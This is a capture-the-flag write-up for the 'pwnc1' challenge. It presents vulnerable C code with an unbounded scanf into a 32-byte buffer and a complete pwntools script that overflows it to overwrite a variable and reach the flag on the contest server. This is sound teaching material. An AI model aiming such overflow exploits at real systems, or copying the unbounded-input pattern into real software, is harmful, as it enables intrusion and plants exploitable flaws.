> For the complete documentation index, see [llms.txt](https://wintertia.gitbook.io/ctf/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://wintertia.gitbook.io/ctf/writeups-2024/the-hacker-conclave-v2/pwnc1.md).

# pwnc1

{% hint style="danger" %}
My blog has migrated to <https://wintertia.pages.dev/> ! This Gitbook will no longer be maintained.
{% endhint %}

> A vulnerable program could you lead to the flag.
>
> By: @4nimanegra

{% file src="/files/vIpiRkDbmZYk3mpp4Qzf" %}

{% file src="/files/wmpGn8UygWN9G4VTpjMc" %}

```
Arch:     amd64
RELRO:      Partial RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        No PIE (0x400000)
Stripped:   No
```

A simple variable overwrite challenge, source code being given definitely makes this way easier.

```c
void pwnme(){

	int number;
	char name[32];

	number=0;

	printf("Insert your name: ");

	scanf("%s",name);

	printf("Welcome home %s\n",name);

	if(number == 8){

		print_flag();

	}

	exit(0);

}
```

Find the offset using gdb until the if statement happens:

<figure><img src="/files/G5cpKZbYYQIUPB7nmWFO" alt=""><figcaption></figcaption></figure>

Offset was 44 bytes which allowed me to easily create an overwrite:

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# -*- template: winterbitia -*-

# ====================
# -- PWNTOOLS SETUP --
# ====================

from pwn import *

exe = context.binary = ELF(args.EXE or 'pwn')
trm = context.terminal = ['tmux', 'splitw', '-h']

host = args.HOST or '130.206.158.146'
port = int(args.PORT or 42011)

def start_local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

def start_remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return start_local(argv, *a, **kw)
    else:
        return start_remote(argv, *a, **kw)

gdbscript = '''
tbreak main
continue
'''.format(**locals())

# =======================
# -- EXPLOIT GOES HERE --
# =======================

io = start()

offset = 44
target_value = 0x8

payload = flat({
    offset: target_value
})

io.clean()
io.sendline(payload)
log.info(io.recvline())

io.interactive()
```

<figure><img src="/files/zYeE9xZa5WnGFbwmrx67" alt=""><figcaption></figcaption></figure>
